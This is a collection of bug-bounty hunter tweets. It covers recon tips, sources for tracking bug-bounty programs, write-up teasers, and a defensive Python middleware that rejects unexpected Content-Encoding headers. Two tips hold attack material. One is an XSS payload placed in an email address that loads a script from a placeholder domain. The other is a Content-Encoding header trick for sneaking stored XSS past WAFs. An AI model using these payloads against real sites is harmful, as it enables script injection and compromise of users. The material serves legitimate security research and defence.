Best month for me in bug bounties till date. Finally level 5 on Synack and made a good amount of bounty in this final month of 2k21. Ranked 61 all across the globe in this past year. Happy me. Let's keep the momentum going. 😇 @SynackRedTeam #bugbounty
Use NextJS? Recon Tip by renniepak
A quick way to find "all" paths for Next.js websites:
DevTools->Console
console.log(__BUILD_MANIFEST.sortedPages)
javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
#infosec #cybersec #bugbountytips
I have finally been recognized as an SRT legend. 😎 Check my Acropolis profile here https://t.co/f2lbUclbKz. Thanks @SynackRedTeam for the amazing opportunity. #bugbounty
XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).
"><img/src/onerror=import('//domain/')>"@yourdomain.com
cc @BRuteLogic - https://t.co/HlFDweFQx6
Mad props to @rafabyte_'s debut security research on "Exploiting HTTP Parsers Inconsistencies" explaining how to bypass Nginx ACL Rules with Node.js, Flask and Spring Boot.
Here's a 4 step guide based on his 5 months of research on how to exploit this.
I recently came across a weird case of cache deception vulnerability on a @SynackRedTeam target. I'm very excited to share the details with y'all.
Also, I'm trying a new blog format this time. I hope you folks like it.
Here you go: https://t.co/Otzav37KhQ
Bug Bounty Tips: 🐛🌟 Want to excel in bug bounty hunting? Don't limit yourself to one program or asset. What if I told you that monitoring new assets and programs from various sources can increase your chances of success? 🚀
Here's a valuable list of sources to track all bug bounty platforms and assets:
1️⃣ Chaos Bug Bounty List - Explore public programs and self-hosted bug bounty program assets: 🔗 https://t.co/3d3Jp6xJly
2️⃣ Bug Bounty Targets Data - Access programs and assets from bugcrowd, hackerone, hackenproof, intigriti, yeswehack, and more: 🔗 https://t.co/FXXTCIqcQ7
3️⃣ bbscope - Utilize this awesome CLI tool to collect information about private program targets using your API: 🔗 https://t.co/dlNLP5jX6y
What can you do with this data? Here are some ideas:
1️⃣ Monitor these sources for new scope updates and receive notifications on Discord, Slack, or via email.
2️⃣ Establish an automated process to handle new targets, such as collecting subdomains and performing basic checks.
3️⃣ Identify interesting assets and start manual hunting to increase your chances of discovering bugs and reducing duplicates. 🕵️‍♂️
Follow these accounts for real-time scope updates:
1️⃣ h1disclosed - Twitter: 🔗 https://t.co/FPq4HhrosB - Get notifications on program launches and disclosed reports.
2️⃣ bbradar - Track all bug bounty programs at: 🔗 https://t.co/YfbtOjUVN5
3️⃣ inbbupdates - Twitter: 🔗 https://t.co/APqAlptVjJ - Receive notifications on scope changes.
This dataset offers endless possibilities. Don't miss out on this opportunity, as many are already harnessing its potential. Elevate your bug bounty game today! 💪🔒 #hackerone #bugcrowd #cybersecurity #bugbountytips #securitytips #bounty #bounties #follow #motivation 🚀💡
Show & Tell: Exploiting an Unusual XXE Vulnerability on a Target App 🕵️‍♂️💻
1/ Often overlooked, XXE vulnerabilities can hide in plain sight, especially in apps seemingly devoid of XML calls to the backend. In this thread, I'll walk you through how I discovered and exploited such an issue in one of my pentest engagements.
#0day #research #bugbounty #informationsecurity https://t.co/hMzpulkHUW
How I *AM* able to abuse Akamai to abuse F5, to abuse all of their customers. This is a bug chain that doesn't require a bug on the target domain to exploit them. But what do I know, I am a freelance nobody.
🕵️‍♂️ Here's another secret no one will tell you about: A Simple WAF Bypass for Stored XSS that has earned me $$$$💰 so far!
Stored XSS issues can fetch you rewards ranging from $500 to $7500, depending on the program.
WAFs can pose significant challenges when hunting for Stored XSS vulnerabilities, but this simple trick can help you bypass them. By adding 'Content-Encoding: any_random_text' to the request header, you can deceive some WAFs, allowing your payload to slip through undetected. Enjoy the hunt! #bugbounty #securityTips #ethicalhacking #WAFBypass #hackerOne #bugcrowd #bugbountytips
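A defender-side check for the Content-Encoding trick in the post above, as an added example that is not from the post's author: a WSGI middleware that answers 415 when a request declares a content coding the application does not decode. It assumes the trick works because a WAF skips a body it cannot decode while the origin ignores the header (the post does not say why); `ACCEPTED_CODINGS`, `demo_app` and `send` are hypothetical names, and the requests are constructed.

```python
import io

# Assumption: this origin decodes no request content codings itself, so only
# "identity" (or no Content-Encoding header at all) is acceptable.
ACCEPTED_CODINGS = {"identity"}


def parse_codings(header_value):
    """Split a Content-Encoding header into lowercase coding tokens."""
    return [t.strip().lower() for t in header_value.split(",") if t.strip()]


class RejectUnknownContentEncoding:
    """Return 415 when a request declares a coding outside the accepted set."""

    def __init__(self, app, accepted=ACCEPTED_CODINGS):
        self.app = app
        self.accepted = set(accepted)

    def __call__(self, environ, start_response):
        codings = parse_codings(environ.get("HTTP_CONTENT_ENCODING", ""))
        if any(c not in self.accepted for c in codings):
            body = b"unsupported Content-Encoding\n"
            start_response("415 Unsupported Media Type", [
                ("Content-Type", "text/plain"),
                ("Content-Length", str(len(body))),
            ])
            return [body]
        return self.app(environ, start_response)


def demo_app(environ, start_response):
    """Constructed stand-in for the real application."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"stored\n"]


def send(app, content_encoding=None, body=b"comment=hello"):
    """Drive the app with a constructed POST and return the status line."""
    environ = {"REQUEST_METHOD": "POST", "PATH_INFO": "/comment",
               "CONTENT_LENGTH": str(len(body)), "wsgi.input": io.BytesIO(body)}
    if content_encoding is not None:
        environ["HTTP_CONTENT_ENCODING"] = content_encoding
    seen = []
    app(environ, lambda status, headers: seen.append(status))
    return seen[0]
```

Rejecting at the origin means the request fails closed regardless of how an upstream WAF treated the header.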
This post is for all beginners who are stuck after solving @PortSwigger Academy. So I have just created a list (@hackthebox_eu) which u can refer & follow after you are done with your basics from @PortSwigger & @PentesterLab.
https://t.co/cpbRUC9ZYV